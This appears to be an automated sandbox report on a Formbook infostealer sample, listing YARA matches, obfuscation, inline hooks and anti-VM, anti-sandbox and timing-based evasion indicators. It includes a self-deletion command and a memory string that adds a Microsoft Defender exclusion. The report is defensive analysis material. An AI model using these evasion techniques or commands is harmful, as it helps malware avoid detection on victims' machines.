Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B6E30 8_2_045B6E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CEBB0 8_2_045CEBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018D21B 8_2_0018D21B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172D90 8_2_00172D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172D87 8_2_00172D87
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00179DEB 8_2_00179DEB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00179E30 8_2_00179E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CF96 8_2_0018CF96
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172FB0 8_2_00172FB0
Sample file is different than original file name gathered from version info
Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.237220905.0000000006230000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.280995621.0000000001068000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281676487.0000000001BBF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Uses 32bit PE files
Source: ox87DNNM8d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: ox87DNNM8d.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@4/3
Source: C:\Users\user\Desktop\ox87DNNM8d.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: ox87DNNM8d.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: ox87DNNM8d.exe Virustotal: Detection: 56%
Source: ox87DNNM8d.exe Metadefender: Detection: 38%
Source: ox87DNNM8d.exe ReversingLabs: Detection: 65%
Source: unknown Process created: C:\Users\user\Desktop\ox87DNNM8d.exe 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe' Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ox87DNNM8d.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ox87DNNM8d.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5CFB8 push edx; ret 1_2_00B5CFF4
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5C8C0 push eax; retf 1_2_00B5C861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5DBCA push eax; retf 1_2_00B5DB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5D21C push eax; retf 1_2_00B5D1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5D966 push edx; ret 1_2_00B5D9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5C65C push edx; ret 1_2_00B5C698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642674D push es; ret 1_2_06426754
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06426799 push es; ret 1_2_0642679C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00401028 push ds; ret 3_2_0040102C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004171DE push 974CB969h; retf 3_2_004171E6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004172CC push edx; ret 3_2_004172D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00416BC9 push es; retf 3_2_00416BDC
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_004163B0 push ss; ret 3_2_004163C6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBC8C0 push eax; retf 3_2_00FBC861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBD966 push edx; ret 3_2_00FBD9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBD21C push eax; retf 3_2_00FBD1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBDBCA push eax; retf 3_2_00FBDB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBC65C push edx; ret 3_2_00FBC698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBCFB8 push edx; ret 3_2_00FBCFF4
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045ED0D1 push ecx; ret 8_2_045ED0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001871DE push 974CB969h; retf 8_2_001871E6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001872CC push edx; ret 8_2_001872D8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_001863B0 push ss; ret 8_2_001863C6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00186BC9 push es; retf 8_2_00186BDC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEA5 push eax; ret 8_2_0018CEF8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEFB push eax; ret 8_2_0018CF62
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CEF2 push eax; ret 8_2_0018CEF8
Source: initial sample Static PE information: section name: .text entropy: 7.93204508639

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ox87DNNM8d.exe PID: 4368, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ox87DNNM8d.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ox87DNNM8d.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000000179B4E second address: 0000000000179B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5636 Thread sleep time: -101791s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5984 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2268 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2268 Thread sleep time: -68000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6548 Thread sleep time: -70000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 101791 Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.501948287.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000004.00000000.237589481.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
Source: explorer.exe, 00000004.00000002.508140093.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
